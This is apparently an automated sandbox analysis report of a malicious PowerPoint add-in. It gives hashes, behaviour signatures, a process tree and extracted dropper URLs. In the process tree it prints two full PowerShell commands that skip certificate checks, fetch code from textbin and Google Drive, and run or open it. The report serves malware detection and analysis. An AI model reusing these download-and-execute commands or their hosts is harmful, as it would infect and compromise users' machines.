Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    26-11-2024 16:06

General

  • Target

    ca57e4060a2afea98eaca795548668cef05e15c0f3a731c1ddc1aac7562abbd1.ppam

  • Size

    7KB

  • MD5

    d9261e8c36689bfd3facc18f17910dc1

  • SHA1

    ca0b6f093448082a736cc3ea3badf5adeea3ab4e

  • SHA256

    ca57e4060a2afea98eaca795548668cef05e15c0f3a731c1ddc1aac7562abbd1

  • SHA512

    292a0da0b19e6f8950957804ea6cf6a98da954fbc78995481143ac8570793d77a204f732e5b514a503022ac1a1fdc51ad5190478db3f4244271ba2860165a36a

  • SSDEEP

    192:xrXP/aKv8DGxzU0AGgMBnUI0JTuayR1NWO:dXPJxltL9UI0JyayRh

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=15ocCLsR2ZmidPwSBKFMdpMbEhO5YtYQ4

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://pt.textbin.net/download/x7sf6t2dgv

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\ca57e4060a2afea98eaca795548668cef05e15c0f3a731c1ddc1aac7562abbd1.ppam"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    PID:1976
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2336
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -command $UmniN;[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$uNTnd = (New-Object Net.WebClient) ;$uNTnd.Encoding = [System.Text.Encoding]::UTF8 ;$UmniN = $uNTnd.DownloadString( 'https://pt.textbin.net/download/x7sf6t2dgv' ) ;$uNTnd = $uNTnd.DownloadString( $UmniN ) ;$x = [System.IO.Path]::GetTempPath() ;Set-Location $x ;$uNTnd | Out-File -FilePath x.js -force ;wscript.exe x.js ; exit
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2852
        • C:\Windows\SysWOW64\wscript.exe
          "C:\Windows\system32\wscript.exe" x.js
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1708
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -command [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$uNTnd = (New-Object Net.WebClient) ;$uNTnd.Encoding = [System.Text.Encoding]::UTF8 ;$uNTnd.DownloadFile( 'https://drive.google.com/uc?export=download&id=15ocCLsR2ZmidPwSBKFMdpMbEhO5YtYQ4', [System.IO.Path]::GetTempPath() + 'x.pptx' ) ;$x = [System.IO.Path]::GetTempPath() ;Set-Location $x ;start x.pptx ; exit
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2236

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\x.js

      Filesize

      796B

      MD5

      b75621ae1faee608b4ed39e971d709a5

      SHA1

      bcd528eb22d2e7b1d11c9b603df87cec37d23da5

      SHA256

      54ce5e89f7c67db8cef4954d8f041857474882dc6af675b4120833bb8832a3a5

      SHA512

      5ef0841caeae364fee32cdd561c7473c45244009ae6dc73f38eefffdb1e95f7cb6f0531ef5d273ca7dd28f408c40a93a3de3c619dab41a0953ab731167ec0e66

    • memory/1976-0-0x000000002D7C1000-0x000000002D7C2000-memory.dmp

      Filesize

      4KB

    • memory/1976-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1976-2-0x000000007214D000-0x0000000072158000-memory.dmp

      Filesize

      44KB

    • memory/1976-11-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

    • memory/1976-10-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

    • memory/1976-8-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

    • memory/1976-5-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

    • memory/1976-6-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

    • memory/1976-4-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB

    • memory/1976-19-0x000000007214D000-0x0000000072158000-memory.dmp

      Filesize

      44KB

    • memory/1976-20-0x0000000000520000-0x0000000000620000-memory.dmp

      Filesize

      1024KB